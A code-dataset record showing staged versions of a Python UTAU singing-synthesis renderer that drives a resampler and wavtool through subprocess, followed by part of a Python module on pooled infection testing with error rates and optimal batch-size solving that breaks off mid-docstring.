"step-2": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\n<mask token>\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\n<mask token>\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n 
LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
"step-3": "<mask token>\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\nUST_FILE = 'filet.ust'\nOTO_FILE = 'Voice\\\\NanaMio\\\\oto.ini'\nVB_PATH = 'Voice\\\\NanaMio'\nRESAMPLER_PATH = 'Resampler\\\\macres.exe'\nWAVTOOL_PATH = 'Resampler\\\\wavtool-yawu.exe'\nCACHE_PATH = 'Cache\\\\'\nOUTPUT_FILE = 'temp.wav'\nUstObject = utaupy.ust.load(UST_FILE)\nOtoObject = Oto(OTO_FILE)\nUstParts = UstObject.notes[4:28]\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\nPreviousNote = -1\nPreviousLength = 0\nTempo = round(float(UstObject.tempo))\nMSPassed = 0\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else 
math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
"step-4": "from Modules.Pitch.Factory import MainFactory\nfrom Modules.ToJson import Oto\nfrom audiolazy.lazy_midi import midi2str\nimport utaupy\nimport string\nimport random\nimport math\nimport os, subprocess, shutil\n\n\ndef RandomString(Length):\n Letters = string.ascii_lowercase\n return ''.join(random.choice(Letters) for i in range(Length))\n\n\nUST_FILE = 'filet.ust'\nOTO_FILE = 'Voice\\\\NanaMio\\\\oto.ini'\nVB_PATH = 'Voice\\\\NanaMio'\nRESAMPLER_PATH = 'Resampler\\\\macres.exe'\nWAVTOOL_PATH = 'Resampler\\\\wavtool-yawu.exe'\nCACHE_PATH = 'Cache\\\\'\nOUTPUT_FILE = 'temp.wav'\nUstObject = utaupy.ust.load(UST_FILE)\nOtoObject = Oto(OTO_FILE)\nUstParts = UstObject.notes[4:28]\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\nPreviousNote = -1\nPreviousLength = 0\nTempo = round(float(UstObject.tempo))\nMSPassed = 0\nopen(OUTPUT_FILE, 'w+')\nfor NIndex, Note in enumerate(UstParts):\n print('prevnote', PreviousNote)\n Rest = False\n if Note.lyric in OtoObject.keys():\n LocalOto = OtoObject[Note.lyric]\n else:\n LocalOto = None\n Rest = True\n Lyric = Note.lyric\n Length = Note.length\n NoteNum = Note.notenum\n PreUtterance = float(LocalOto['PreUtterance']) if not Rest else 0\n Velocity = Note.velocity\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n PBS = Note.pbs\n except KeyError:\n PBS = None\n try:\n PBW = Note['PBW'].split(',')\n except KeyError:\n PBW = None\n try:\n PBY = Note['PBY'].split(',')\n for Index, Var in enumerate(PBY):\n if Var == '':\n PBY[Index] = '0'\n except KeyError:\n PBY = []\n try:\n PBM = Note.pbm\n except KeyError:\n PBM = []\n try:\n VBR = Note.get_by_key('VBR').split(',')\n except KeyError:\n VBR = None\n try:\n Flags = Note.get_by_key('Flags')\n except KeyError:\n Flags = '?'\n try:\n Modulation = Note.get_by_key('Modulation')\n except KeyError:\n Modulation = 100\n try:\n Intensity = Note.get_by_key('Intensity')\n except KeyError:\n Intensity = 100\n try:\n StartPoint = Note.get_by_key('StartPoint')\n except KeyError:\n StartPoint = 0\n try:\n Envelope = Note.get_by_key('Envelope')\n Envelope = Envelope.replace('%', LocalOto['Overlap']).split(',')\n except (KeyError, TypeError):\n Envelope = ['0', '5', '35', '0', '100', '100', '0']\n FileOrder = f'{NIndex:05}'\n if Rest:\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(MSPassed), str(\n Length)] + ['0'] * 11\n PreviousNote = -1\n MSPassed += float(Length)\n subprocess.call(WavtoolParam)\n else:\n if PreviousNote == -1:\n PrevNote = NoteNum\n else:\n PrevNote = int(PreviousNote)\n if PBS is not None and PBW is not None:\n PB = MainFactory()\n PB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW,\n PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=\n PBM, VBR=VBR)\n PitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed +\n PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / \n 5)), NoteNum)\n else:\n PitchBendData = None\n if PreUtterance - float(LocalOto['Overlap']) > PreviousLength // 2:\n CorrectionRate = PreviousLength // 2 / (PreUtterance - float(\n LocalOto['Overlap']))\n BitedPreUtterance = PreUtterance * CorrectionRate\n BitedOverlap = float(LocalOto['Overlap']) * CorrectionRate\n else:\n BitedPreUtterance = PreUtterance\n BitedOverlap = float(LocalOto['Overlap'])\n BitedSTP = PreUtterance - BitedPreUtterance\n LengthRequire = Length + float(StartPoint\n ) - BitedSTP + BitedOverlap + 50\n if 
LengthRequire < float(LocalOto['Consonant']):\n LengthRequire = float(LocalOto['Consonant'])\n LengthRequire = (LengthRequire // 50 * 50 if LengthRequire / 50 - \n LengthRequire // 50 < 0.5 else math.ceil(LengthRequire / 50) * 50)\n InputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto['File'])\n OutputFile = os.path.join(os.getcwd(), CACHE_PATH,\n f'{FileOrder}_{Lyric}_{RandomString(6)}.wav')\n Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH), InputFile,\n OutputFile, midi2str(NoteNum), str(Velocity), Flags, LocalOto[\n 'Offset'], str(int(LengthRequire)), LocalOto['Consonant'],\n LocalOto['Cutoff'], Intensity, Modulation, f'!{Tempo}' if \n PitchBendData is not None else '', f'{PitchBendData}' if \n PitchBendData is not None else '']\n print(Parameters)\n PreviousNote = NoteNum\n PreviousLength = float(Length)\n MSPassed += float(Length)\n subprocess.call(Parameters)\n if NIndex + 1 < len(UstParts) and UstParts[NIndex + 1\n ].lyric in OtoObject.keys():\n NextOto = OtoObject[UstParts[NIndex + 1].lyric]\n NextPreUtterance = float(NextOto['PreUtterance'])\n NextOverlap = float(NextOto['Overlap'])\n WavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\n else:\n WavtoolCorrection = PreUtterance\n sign = '+' if WavtoolCorrection >= 0 else ''\n WavtoolParam = [os.path.join(os.getcwd(), WAVTOOL_PATH), os.path.\n join(os.getcwd(), OUTPUT_FILE), OutputFile, str(float(\n StartPoint)), f'{Length}@{float(Tempo)}{sign}{WavtoolCorrection}'\n ] + [str(i) for i in Envelope]\n subprocess.call(WavtoolParam)\n",
"step-5": "from Modules.Pitch.Factory import MainFactory\r\nfrom Modules.ToJson import Oto \r\nfrom audiolazy.lazy_midi import midi2str\r\nimport utaupy\r\nimport string\r\nimport random\r\nimport math\r\nimport os, subprocess, shutil\r\n\r\ndef RandomString(Length):\r\n\tLetters = string.ascii_lowercase\r\n\treturn ''.join(random.choice(Letters) for i in range(Length))\r\n\r\nUST_FILE = \"filet.ust\"\r\nOTO_FILE = \"Voice\\\\NanaMio\\\\oto.ini\"\r\nVB_PATH = \"Voice\\\\NanaMio\"\r\nRESAMPLER_PATH = \"Resampler\\\\macres.exe\"\r\nWAVTOOL_PATH = \"Resampler\\\\wavtool-yawu.exe\"\r\nCACHE_PATH = \"Cache\\\\\"\r\nOUTPUT_FILE = \"temp.wav\"\r\nUstObject = utaupy.ust.load(UST_FILE)\r\nOtoObject = Oto(OTO_FILE)\r\nUstParts = UstObject.notes[4:28]\r\n\r\nshutil.rmtree(os.path.join(os.getcwd(), CACHE_PATH))\r\nos.mkdir(os.path.join(os.getcwd(), CACHE_PATH))\r\n\r\nPreviousNote = -1\r\nPreviousLength = 0\r\nTempo = round(float(UstObject.tempo))\r\nMSPassed = 0\r\nopen(OUTPUT_FILE, \"w+\")\r\nfor NIndex, Note in enumerate(UstParts):\r\n\tprint(\"prevnote\", PreviousNote)\r\n\tRest = False\r\n\tif Note.lyric in OtoObject.keys():\r\n\t\tLocalOto = OtoObject[Note.lyric]\r\n\telse:\r\n\t\tLocalOto = None\r\n\t\tRest = True\r\n\r\n\tLyric = Note.lyric\r\n\tLength = Note.length\r\n\tNoteNum = Note.notenum\r\n\tPreUtterance = float(LocalOto[\"PreUtterance\"]) if not Rest else 0\r\n\tVelocity = Note.velocity\r\n\r\n\t# try:\r\n\t# \tPreUtterance = Note.get_by_key(\"PreUtterance\")\r\n\t# except KeyError:\r\n\t# \tPreUtterance = 0\r\n\r\n\ttry:\r\n\t\tStartPoint = Note.get_by_key(\"StartPoint\")\r\n\texcept KeyError:\r\n\t\tStartPoint = 0\r\n\r\n\ttry:\r\n\t\tPBS = Note.pbs\r\n\texcept KeyError:\r\n\t\tPBS = None\r\n\t\r\n\ttry:\r\n\t\tPBW = Note[\"PBW\"].split(\",\")\r\n\texcept KeyError:\r\n\t\tPBW = None\r\n\r\n\ttry:\r\n\t\tPBY = Note[\"PBY\"].split(\",\")\r\n\t\tfor Index, Var in enumerate(PBY):\r\n\t\t\tif Var == \"\":\r\n\t\t\t\tPBY[Index] = \"0\"\r\n\texcept KeyError:\r\n\t\tPBY = []\r\n\r\n\ttry:\r\n\t\tPBM = Note.pbm\r\n\texcept KeyError:\r\n\t\tPBM = []\r\n\r\n\ttry:\r\n\t\tVBR = Note.get_by_key(\"VBR\").split(\",\")\r\n\texcept KeyError:\r\n\t\tVBR = None\r\n\r\n\ttry:\r\n\t\tFlags = Note.get_by_key(\"Flags\")\r\n\texcept KeyError:\r\n\t\tFlags = \"?\"\r\n\r\n\ttry:\r\n\t\tModulation = Note.get_by_key(\"Modulation\")\r\n\texcept KeyError:\r\n\t\tModulation = 100\r\n\r\n\ttry:\r\n\t\tIntensity = Note.get_by_key(\"Intensity\")\r\n\texcept KeyError:\r\n\t\tIntensity = 100\r\n\r\n\ttry:\r\n\t\tStartPoint = Note.get_by_key(\"StartPoint\")\r\n\texcept KeyError:\r\n\t\tStartPoint = 0\r\n\r\n\ttry:\r\n\t\tEnvelope = Note.get_by_key(\"Envelope\")\r\n\t\tEnvelope = Envelope.replace(\"%\", LocalOto[\"Overlap\"]).split(\",\")\r\n\texcept (KeyError, TypeError):\r\n\t\tEnvelope = [\"0\",\"5\",\"35\",\"0\",\"100\",\"100\",\"0\"]\r\n\r\n\tFileOrder = f\"{NIndex:05}\"\r\n\tif Rest:\r\n\t\t# Parameters = [os.path.join(os.getcwd(), RESAMPLER_PATH),os.path.join(os.getcwd(), CACHE_PATH, SILENCE_FILE), os.path.join(os.getcwd(),f\"{FileOrder}_Blank_{RandomString(6)}.wav\"),utaupy.ust.notenum_as_abc(NoteNum),\"100\",\"?\",\"0\",str(int(Length//50 *50 if Length/50 - Length//50 < 0.5 else math.ceil(Length/50) * 50)),\"0\",\"0\",\"100\",\"0\"]\r\n\t\t# Segment = AudioSegment.silent(duration=Length)\r\n\t\tWavtoolParam = [\r\n\t\t\tos.path.join(os.getcwd(), WAVTOOL_PATH), \r\n\t\t\tos.path.join(os.getcwd(), OUTPUT_FILE), \r\n\t\t\tOutputFile, \r\n\t\t\tstr(MSPassed), \r\n\t\t\tstr(Length)\r\n\t\t] + ([\"0\"] * 
11)\r\n\t\tPreviousNote = -1\r\n\t\tMSPassed += float(Length)\r\n\t\tsubprocess.call(WavtoolParam)\r\n\telse:\r\n\t\tif PreviousNote == -1:\r\n\t\t\tPrevNote = NoteNum\r\n\t\telse:\r\n\t\t\tPrevNote = int(PreviousNote)\r\n\r\n\t\tif PBS is not None and PBW is not None:\r\n\t\t\tPB = MainFactory()\r\n\t\t\tPB.AddPitchBends(MSPassed, MSPassed + float(Length), PBS, PBW, PrevNoteNum=PrevNote, CurrentNoteNum=NoteNum, PBY=PBY, PBM=PBM, VBR=VBR)\r\n\t\t\tPitchBendData = PB.RenderPitchBends(int(math.ceil((MSPassed + PBS[0]) / 5)), int(math.floor((MSPassed + float(Length)) / 5)), NoteNum)\r\n\t\telse:\r\n\t\t\tPitchBendData = None\r\n\r\n\r\n\t\t# Bite Correction (The previous note should last for half the length before overlap)\r\n\t\tif PreUtterance - float(LocalOto[\"Overlap\"]) > (PreviousLength // 2):\r\n\t\t\tCorrectionRate = (PreviousLength // 2) / (PreUtterance - float(LocalOto[\"Overlap\"]))\r\n\t\t\tBitedPreUtterance = PreUtterance * CorrectionRate\r\n\t\t\tBitedOverlap = float(LocalOto[\"Overlap\"]) * CorrectionRate\r\n\t\telse:\r\n\t\t\tBitedPreUtterance = PreUtterance\r\n\t\t\tBitedOverlap = float(LocalOto[\"Overlap\"])\r\n\r\n\t\tBitedSTP = PreUtterance - BitedPreUtterance \r\n\r\n\t\tLengthRequire = Length + float(StartPoint) - BitedSTP + BitedOverlap + 50\r\n\t\tif LengthRequire < float(LocalOto[\"Consonant\"]):\r\n\t\t\tLengthRequire = float(LocalOto[\"Consonant\"])\r\n\r\n\t\tLengthRequire = LengthRequire//50 *50 if LengthRequire/50 - LengthRequire//50 < 0.5 else math.ceil(LengthRequire/50) * 50\r\n\r\n\t\tInputFile = os.path.join(os.getcwd(), VB_PATH, LocalOto[\"File\"])\r\n\t\tOutputFile = os.path.join(os.getcwd(), CACHE_PATH, f\"{FileOrder}_{Lyric}_{RandomString(6)}.wav\")\r\n\r\n\t\tParameters = [\r\n\t\t\tos.path.join(os.getcwd(), RESAMPLER_PATH),\r\n\t\t\tInputFile, \r\n\t\t\tOutputFile,\r\n\t\t\tmidi2str(NoteNum),\r\n\t\t\tstr(Velocity),\r\n\t\t\tFlags,\r\n\t\t\tLocalOto[\"Offset\"],\r\n\t\t\tstr(int(LengthRequire)),\r\n\t\t\tLocalOto[\"Consonant\"],\r\n\t\t\tLocalOto[\"Cutoff\"],\r\n\t\t\tIntensity,\r\n\t\t\tModulation,\r\n\t\t\tf\"!{Tempo}\" if PitchBendData is not None else \"\",\r\n\t\t\tf\"{PitchBendData}\" if PitchBendData is not None else \"\"\r\n\t\t]\r\n\r\n\t\tprint(Parameters)\r\n\r\n\t\tPreviousNote = NoteNum\r\n\t\tPreviousLength = float(Length)\r\n\t\tMSPassed += float(Length)\r\n\t\tsubprocess.call(Parameters)\r\n\r\n\t\tif NIndex + 1 < len(UstParts) and UstParts[NIndex+1].lyric in OtoObject.keys():\r\n\t\t\tNextOto = OtoObject[UstParts[NIndex+1].lyric]\r\n\t\t\tNextPreUtterance = float(NextOto[\"PreUtterance\"])\r\n\t\t\tNextOverlap = float(NextOto[\"Overlap\"])\r\n\r\n\t\t\tWavtoolCorrection = PreUtterance - NextPreUtterance + NextOverlap\r\n\t\telse:\r\n\t\t\tWavtoolCorrection = PreUtterance\r\n\r\n\t\tsign = \"+\" if WavtoolCorrection >= 0 else \"\"\r\n\t\tWavtoolParam = [\r\n\t\t\tos.path.join(os.getcwd(), WAVTOOL_PATH), \r\n\t\t\tos.path.join(os.getcwd(), OUTPUT_FILE), \r\n\t\t\tOutputFile, \r\n\t\t\tstr(float(StartPoint)), \r\n\t\t\tf\"{Length}@{float(Tempo)}{sign}{WavtoolCorrection}\"\r\n\t\t] + [str(i) for i in Envelope] \r\n\r\n\t\tsubprocess.call(WavtoolParam)\r\n\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
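    """
    Tests every subject `num` times in parallel and flags the subject positive
    if any one of the replicates is positive: an infected subject is missed only
    when all `num` replicates miss (probability typeII_error ** num), while an
    uninfected subject is flagged when any replicate gives a false positive.
    Returns the per-subject results and the test consumption
    (len(subject_array) * num), reported twice, mirroring the
    (total consumption, individual consumption) pair returned by the other routines.
    """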
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
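# Quick sanity check for the two posterior-rate functions above (a sketch; assumes
# numpy is imported as np in the elided header). Whenever the test is informative
# (typeI_error + typeII_error < 1), the rate on a negative batch falls below the
# prior p and the rate on a positive batch rises above it:
#
#   p = 0.01
#   p_neg = infection_rate_on_negative_batch(p, 10, typeII_error=0.05, typeI_error=0.01)
#   p_pos = infection_rate_on_positive_batch(p, 10, typeII_error=0.05, typeI_error=0.01)
#   assert p_neg < p < p_pos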
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
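# Usage sketch (assumes numpy and scipy.optimize.fsolve are imported in the elided
# header; the integer-valued wrapper one_batch_test_int_solver used below is defined
# in an elided section as well). For a small infection rate the continuous optimum
# is on the order of 1 / sqrt(p), i.e. roughly ten subjects per batch for p = 0.01:
#
#   n_star = one_batch_test_solver(0.01, typeII_error=0.05, typeI_error=0.01)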
<|reserved_special_token_0|>
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
    batch_limit=32):
"""
The helpfunction is a handy function to give the list of subjects on the
    negative batch(es), the list of subjects on the positive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
        temp1 (Numpy Array): an array of subjects on the positive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
    if len(subject_array) == 0:
        # empty input: return empty splits and zero test consumption
        return np.array([]), np.array([]), 0, p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    Type I error, and the number of repetitions, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
        stop_rule (int): the number of positive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
